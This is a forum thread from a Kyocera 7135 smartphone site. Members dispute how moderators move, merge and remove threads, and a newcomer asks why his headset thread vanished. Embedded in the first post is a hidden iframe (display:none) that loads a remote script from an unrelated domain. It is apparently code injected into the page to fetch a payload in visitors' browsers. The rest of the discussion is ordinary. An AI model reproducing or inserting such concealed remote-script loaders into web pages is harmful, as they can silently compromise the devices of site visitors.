+ Reply to Thread
Page 1 of 2 1 2 LastLast

New Threads being removed

Any reason why new threads posted are removed from this board for some authors while other meaningless (useless) threads are left up?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    pvm

ok guys let's move this one to the trash

Same question here.

Can you give examples? I can only think of one at this point, dealing with the march madness for the cell phones. I think that belongs in the 7135 discussion.

That one was moved to General....

B.

Not that anyone asked me, but as the author of one of the March Madness threads, I agree with the decision to move it. By the way, I was a sysop on a Compuserve forum for almost 20 years, and I certainly appreciate the care that the discussion board managers here have taken to maintain all of smartphonesource.com.

I moved this thread to the Site News/Ideas thread, b/c it deals with how the "site" works, and not how the 7135 works....

Now, on to the question, the moderators move some threads that would fit better or get a better response in another category...for instance, this thread does not directly relate to the 7135, but more directly relates to how "Smartphonesource.com" works...therefore it really doesn't belong in the 7135 category.

As far as threads getting "removed" perhaps they were merged with another thread discussing the same issue. This helps prevent the board from getting overcluttered.

And, as far as "meaningless" threads, could you give examples?
    --Jazz--

Administrator
    agreed. if i move merge a thread i will send a pm to the author of the post to let him know where it is... unless it was moved to a thread with the same or similar topic. most of the time a post is merged with another thread already discussing the issue..

as long as the person is aware of where the post goes, there should not be a problem IMO... each section of this forum gets looked at on a daily basis. :UpThum

jeh
    Fine, but there are a lot of threads being unnecessarily (IMO) moved from "Kyocera 7135 | 7135 Discussion" to the "Off topic | General discussion" forum. Threads that clearly qualify as "7135 Discussion - General Discussion. Anything goes".

Just how does a thread on "should I return my 7135?" not qualify there? Or a thread discussing a review of the 7135?

Perhaps the moderators are using some strange new definitions of "7135", "General", "discussion", or "anything" that I'm not aware of?

Perhaps the real rules for the "7135 Discussion" forum could be spelled out somewhere, so that posters could make fewer mistakes when they create new threads? Whatever the rules are they're clearly more restrictive than any ordinary interpretation of "7135 Discussion - General Discussion. Anything goes" would lead a reasonable person to believe.

I'd think the "off topic | general discussion" forum was for things not pertaining to the 7135 or 6035. Things like other phones, other mobile phone technologies, and so on. The trouble is that many of the threads recently moved from "7135 Discussion" most certainly do pertain to the 7135. Moving them violates a fundamental principle of organization of information (not just discussion forums): You want to keep threads in the most specifically chartered forum where they fit; it's almost never a good idea to move a thread from a more-specific forum to a less-specific one, unless it clearly doesn't fit where it is.

By the way, I have a lot of experience in moderating discussion forums too. My experience led me to believe that moving a thread because you think it will get a better response is almost always a bad idea; as a matter of fact, moving a thread often results in killing it, as the original participants don't necessarily check up on its new home. Even if they follow the link to the new thread, that doesn't mean they check up on it after that, because the link in the old forum doesn't show when there are later responses. On the forums I worked on the conclusion was that a thread should only be moved if it is clearly out of place for the charter of its original home.

> as long as the person is aware of where the post goes, there
    > should not be a problem IMO... each section of this forum gets
    > looked at on a daily basis.

Maybe by the moderators. But not by the readers and potential responders. Readers tend to pick a few topic headings and follow them, and check up on the others occasionally if ever. You need to email not just the original poster, but also everyone else who posted in the moved thread.

And even with an explanatory email, having a thread you started, or even responded to, get moved, does not feel good. To a lot of posters it feels like a form of censorship; to some others it feels like being told "you did something wrong", even if it's just "we thought this other forum would be a better fit."

In particular a LOT of the threads moved recently have been not completely pro-7135, some have been outright critical... and the result feels to me like the moderators are trying to shunt all those negative opinions away from the main 7135 area of the site. Even if this isn't the case (and I'd like to believe it isn't), this is a bad impression to give, or even take a small risk of giving.

jeh
    Originally posted by ogakor
    Not that anyone asked me, but as the author of one of the March Madness threads, I agree with the decision to move it.
    Well, as author of one of the others, I don't agree. How on earth could it be construed as NOT being about the 7135???

Jazz

'Meaningless' threads.....None, but you can remove all of my posted comments, they are pretty much 'meaningless' if not down right distracting. LOL

I have never posted on any boards before. Thanks for the opportunity to try it out. Thanks to critics, too!

Suggest that e-mailing folks about moved threads should be limited to those that signed up for a thread...as it may be already.

This board is growing, and growing, so I feel good seeing that it is being managed. But then I've been lurking and learning for 10 months and have more trust than some that decisions are good.

Question, anything being done about the statistics on the number of views, comments, etc.? Seems like negative threads get a lot of view hits. Maybe new owners prefer negative comments and problem related subjects first. Might help some to know how to put in key words into their thread title to attract readers.

'Help' seems to mean - 'Too excited to stop and do a search'!

Administrator
    all sections of This board get viewed, so it doesn't mater where the thread is placed as Long as the redirect is there. the "definition" of the general section may need to me re worded.

imo, the only reason i can see someone complaining about moving a post is because you don't get post credit in the general section. as i have said before, every section of this great forum gets viewed!

as more and more people come on board since the 7135 has finally been released, there will be (and has already been) a huge increase threads to appear and there will be some of them that will get moved to their respective places.:Smoke:

jeh
    > all sections of This board get viewed,

Certainly by some. But I tell you with equal certainty that that is not the case for everyone. In any forum like this there is at least a siginficant minority who only follows the sections of direct, obvious interest to them.

(And, this should be obvious, but they won't be looking here... so just because none of them post to say "yes, that's me," don't assume that they aren't there.)

Before I got the 7135 I followed the 6035 section almost exclusively. Why would I look at the "off topic" section when there was a section that was clearly "on topic" for what I wanted?

Same with the 7135. When I got interested in it, I started looking at the 7135 section also. It would never have occurred to me to look in the "Off topic" section for stuff pertaining to the 7135, when there was clearly a place for 7135 threads.

> so it doesn't mater where
    > the thread is placed as Long as the redirect is there.

Well, two answers here. One, if it doesn't matter where they are, then why move them? Heh heh heh...

It does matter. Subsequent replies to a moved thread do not show up in its original forum, nor in the original forum's "last post" indicator. People who only follow the original forum are therefore left behind.

> the "definition" of the general section may need to me re worded.

Yes. I just opened it, and out of 25 threads on the first page, at least half clearly are not "off topic" for the 7135 section.

Moving more and more 7135-related threads to a forum in a section labelled "off topic" is not, repeat NOT, the right thing, however that forum is labelled. A thread should always go in the most specifically-chartered forum for its topic. It looks to me as though a lot of these threads in "off topic- general discussion" should be moved to the 7135 general forum... not the other way around.

What you might want to do instead, if you want to keep the clutter down in the main 7135 forum, is open up another forum in the 7135 section for non-tech stuff. Stuff like reviews, discussions of reviews, should I return it or not, Verizon pricing plans directly associated with 7135 use, and so on.

jeh
    p.s. If you really want to do something about clutter, how about getting rid of the FOUR news items on the front page that link to articles about the long-since-ended c|net vote?

I agree with jeh. I have had several post movd (ok, maybe 3 or 4). I agree that some shouel but some should not. It seems that there are similar post that stayed on the 7135 discussion board, while others are moved. Now mine probably should be moves, but others are still there. It just seems inconsistant.

That and a lot of folks do not read the generall forumn.
    Walt

jeh
    Ok, I have another reason that 7135 threads should be left in the 7135 "group": Searches.

I have a charging problem with my new phone. So naturally I came here to do a search for relevant posts.

Unfortunately, due to the completely arbitrary movement of many 7135-related threads to the "off-topic - general" forum from the 7135 forum where they obviously and properly belong, I now have to do TWO searches to find relevant references to "charging": One of the 7135 group, and on in the "off topic - general" forum.

Searching the whole site isn't the answer, as then I get 6035-related posts too.

This is BROKEN, people.

headset thread removed with no explanation

Hello,

A new thread called "headset" was removed with no explanation?

The thread was to get recommendations for good headsets for the 7135 ...

exactly what is wrong with that?

David

Re: headset thread removed with no explanation

Originally posted by diyoha
    Hello,

A new thread called "headset" was removed with no explanation?

The thread was to get recommendations for good headsets for the 7135 ...

exactly what is wrong with that?

David
    More than likely it was merged with another similiar thread. Many times a mod with PM you to let you know that, but I guess that's not always the case
    Please visit my picture site: Robert-O-Rama :)

I think quickly merging threads is not a very good idea.

First it does not move the thread to the top of the pile (correct me if that is not the case) thus greatly increasing the chance of not getting a response

Second my question although similar to another thread may have a very different objective which would be lost in the merging.

David

Administrator

I moved it...

hi,
    i moved your thread, and i apologize for not sending you a PM. i usually do send a PM if the thread was moved to a location that was totally different to the original location. if its in the same forum with the same topic i usually wont send a PM to the person since when they log back in to the site they will see the topic that they asked about. clear as mud? :p

since you are a new person to the forum, i would suggest you search for your question before you post. 99.9% of the time the question has been already asked. you question was moved to the "compatible headsets for 7135" thread on the same page. that thread is totally relevant to your question. had you done a search you would have saw the thread and may have gotten a good answer for your question.

when someone replies to a thread , be it old or new, there is a arrow next to the thread that a member can tap that will take him/her to the newest post in the thread. so many people will see and respond to your question if its in a thread that has the same info over someone merely posting a new topic that has been discussed time and time over.

again, welcome to the board and i appreciate your feedback. but please be advised that sometimes a thread will get moved. it has nothing to do with any individual poster but more to do with housecleaning of the site. we have just recovered form a bad hard drive crash and we are trying to get the site back to the order it was.

now, even though you didnt start a new topic on this question yo uasked, several people stil saw it and responded to it.

you searched for this thread and found a topic you were looking for, so if you continue to do that you will be very educated on this great phone and may not even have to ask any question!

Hello marctronixx,

thanks for your response.

I really like this forum and have found it super useful for the last couple days of intense research.

I am new to this forum but not new to the world of *forums* so I know to do lots of searching before I post.

if you notice I have responded to many threads even ones that are months old since I found them to be relevant to my question.

I actually found the thread you moved my post to and then posted my topic separately because:
    I was looking for what exact *products* people had gotten and why ... not the *type* of headsets (wireless, earplug, etc) which is what that thread focused on. (note that I have not gotten any response to my question )

I was interested in finding out what people liked, was it comfortable, the quality of the mike, the features they liked etc. to help me decide what I am going to buy ...

that I think (and still do) is a different focus that that thread.

again this is a great board and I appreciate the explanation! At first I was just really trying to find out what happened to my darn post

David